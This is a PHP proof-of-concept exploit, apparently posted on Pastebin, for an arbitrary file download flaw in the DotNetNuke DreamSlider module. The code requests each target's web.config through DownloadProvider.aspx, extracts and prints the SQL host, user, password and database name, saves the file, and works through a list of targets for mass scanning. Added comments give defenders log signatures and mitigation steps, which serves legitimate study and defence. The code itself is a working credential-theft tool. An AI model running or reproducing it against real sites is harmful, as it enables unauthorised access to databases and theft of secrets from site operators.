AgusSR

dotNetNuke DreamSlider Arbitrary File Download

Dec 30th, 2017
<?php
/**
 * Pastebin-published proof-of-concept for an arbitrary file download in the
 * DreamSlider module for DotNetNuke (per the paste title).
 *
 * What the code does: issues one GET to
 * /DesktopModules/DreamSlider/DownloadProvider.aspx with File=~/web.config,
 * prints the SQL connection-string fields it finds in the response and writes
 * the whole response to <host>_web.config in the working directory.
 *
 * Notes for defenders:
 *  - Detection: look in web server logs for requests to DownloadProvider.aspx
 *    under DesktopModules/DreamSlider whose File parameter names web.config.
 *    This client sends a fresh 32-hex-character User-Agent (md5(uniqid()))
 *    on every request.
 *  - Response: if such a request was answered with the file, treat every
 *    secret stored in web.config (database credentials at minimum) as
 *    disclosed and rotate them.
 *  - Mitigation: remove or update the module, or block the handler at the
 *    web server / WAF until it validates the requested path.
 */
Class IDX_dotNetNuke {
    // Site under test; set by the caller before validUrl()/exploit() are used.
    public $url;

    /**
     * Returns $this->url with a scheme.
     *
     * "http://" is prepended unless the value already starts with "http://"
     * or "https://" (case-sensitive match). $this->url itself is not modified.
     */
    public function validUrl() {
        if(!preg_match("/^http:\/\//", $this->url) AND !preg_match("/^https:\/\//", $this->url)) {
            $url = "http://".$this->url;
            return $url;
        } else {
            return $this->url;
        }
    }

    /**
     * Minimal cURL wrapper used for the HTTP request.
     *
     * @param string     $url     Full request URL.
     * @param mixed      $data    When not null, sent as the POST body.
     * @param array|null $headers When not null, passed to CURLOPT_HTTPHEADER.
     * @param bool       $cookie  When strictly true, cookies are read from and
     *                            written to cookie.txt in the working directory.
     * @return object Object with "response" (body string, or false when the
     *                transfer failed) and "info" (the curl_getinfo() array).
     */
    public function curl($url, $data = null, $headers = null, $cookie = true) {
        $ch = curl_init();
              curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
              curl_setopt($ch, CURLOPT_URL, $url);
              // Random User-Agent per request: md5() of uniqid(), i.e. 32 hex
              // characters. Unusual for real browsers, so useful as a log signature.
              curl_setopt($ch, CURLOPT_USERAGENT, md5(uniqid()));
              //curl_setopt($ch, CURLOPT_VERBOSE, TRUE);
              // Host-name and certificate verification are both switched off,
              // so the TLS peer is never authenticated.
              curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
              curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
              // 5 seconds to connect, 5 seconds for the whole transfer.
              curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
              curl_setopt($ch, CURLOPT_TIMEOUT, 5);

        // A non-null $data turns the request into a POST carrying $data.
        if($data !== null) {
              curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
              curl_setopt($ch, CURLOPT_POST, TRUE);
              curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        }

        if($headers !== null) {
              curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
        }

        if($cookie === true) {
              // NOTE(review): CURLOPT_COOKIE is documented to take a cookie
              // string; a boolean is passed here. The file/jar options below
              // are the ones that persist cookies between requests.
              curl_setopt($ch, CURLOPT_COOKIE, TRUE);
              curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
              curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt");
        }

        // With CURLOPT_RETURNTRANSFER set, curl_exec() yields the body or false.
        $exec = curl_exec($ch);
        $info = curl_getinfo($ch);

              curl_close($ch);

        return (object) [
            "response"  => $exec,
            "info"      => $info
        ];

    }

    /**
     * Returns the text found between two markers.
     *
     * @param string $param Text to search.
     * @param string $kata1 Opening marker; extraction starts right after its
     *                      first occurrence.
     * @param string $kata2 Closing marker; extraction stops at its first
     *                      occurrence after the opening marker.
     * @return string|false FALSE when either marker does not occur in $param.
     */
    public function getValue($param, $kata1, $kata2) {
        if(strpos($param, $kata1) === FALSE) return FALSE;
        if(strpos($param, $kata2) === FALSE) return FALSE;
        $start = strpos($param, $kata1) + strlen($kata1);
        $end = strpos($param, $kata2, $start);
        $return = substr($param, $start, $end - $start);
        return $return;
    }

    /**
     * Requests web.config through the DreamSlider download handler, prints the
     * connection-string fields found in the response and saves the response.
     *
     * For incident response: the URL built below is the exact request to
     * search for in access logs. A response that contains the file means the
     * application's configuration secrets have left the server.
     */
    public function exploit() {
        // This first assignment is immediately overwritten by validUrl().
        $url = $this->url;
        $url = $this->validUrl();

        // "~/" is the ASP.NET application-root prefix, so this names the
        // site's own web.config.
        $file = "~/web.config";
        $get  = $this->curl($url."/DesktopModules/DreamSlider/DownloadProvider.aspx?File=".$file);

        // Empty loop body: while the response is false nothing here changes
        // it, so a failed transfer never leaves this loop.
        while($get->response === false) {}

        // Look for the SQL connection-string fields in the returned text.
        preg_match("/Data Source=(.*?)/i", $get->response, $host);
        preg_match("/User ID=(.*?);/i", $get->response, $user);
        $pass = $this->getValue($get->response, ";Password=" , "\"");
        preg_match("/Initial Catalog=(.*?);/i", $get->response, $db);

        // The extracted values are echoed to stdout in clear text; the
        // "saved!" line is printed before save() actually runs.
        print "[>] Host: ".$host[1]." | User: ".$user[1]." | Pass: ".$pass." | Db: ".$db[1]." \n";
        print "[>] ".parse_url($this->url, PHP_URL_HOST)."_web.config saved!\n\n";
        $this->save($get->response);

    }

    /**
     * Writes $data to "<host>_web.config" in the current working directory,
     * where <host> is the host part of $this->url. Mode "w" overwrites an
     * existing file; the fopen() result is not checked.
     */
    public function save($data) {
        $handle = fopen(parse_url($this->url, PHP_URL_HOST)."_web.config", "w");
        fwrite($handle, $data);
        fclose($handle);
    }
}
// Command-line driver: runs IDX_dotNetNuke::exploit() once per line of a
// target list. Because it works from a list rather than a single site,
// defenders should expect this request pattern as opportunistic scanning
// across many hosts rather than as a targeted attempt.
$dotNetNuke = new IDX_dotNetNuke();

// argv[1] must name an existing text file with one site per line.
if(!isset($argv[1])) die("!! Usage: php ".$argv[0]." target.txt");
// The message below is Indonesian for "target file ... not found".
if(!file_exists($argv[1])) die("!! File target ".$argv[1]." tidak di temukan!!");
$open = explode("\n", file_get_contents($argv[1]));

foreach($open as $list) {
    // Whitespace is trimmed and a scheme is added before the host is printed;
    // exploit() calls validUrl() again on the already normalised value.
    $dotNetNuke->url = trim($list);
    $dotNetNuke->url = $dotNetNuke->validUrl();

    print "[*] Exploiting ".parse_url($dotNetNuke->url, PHP_URL_HOST)."\n";
    $dotNetNuke->exploit();
}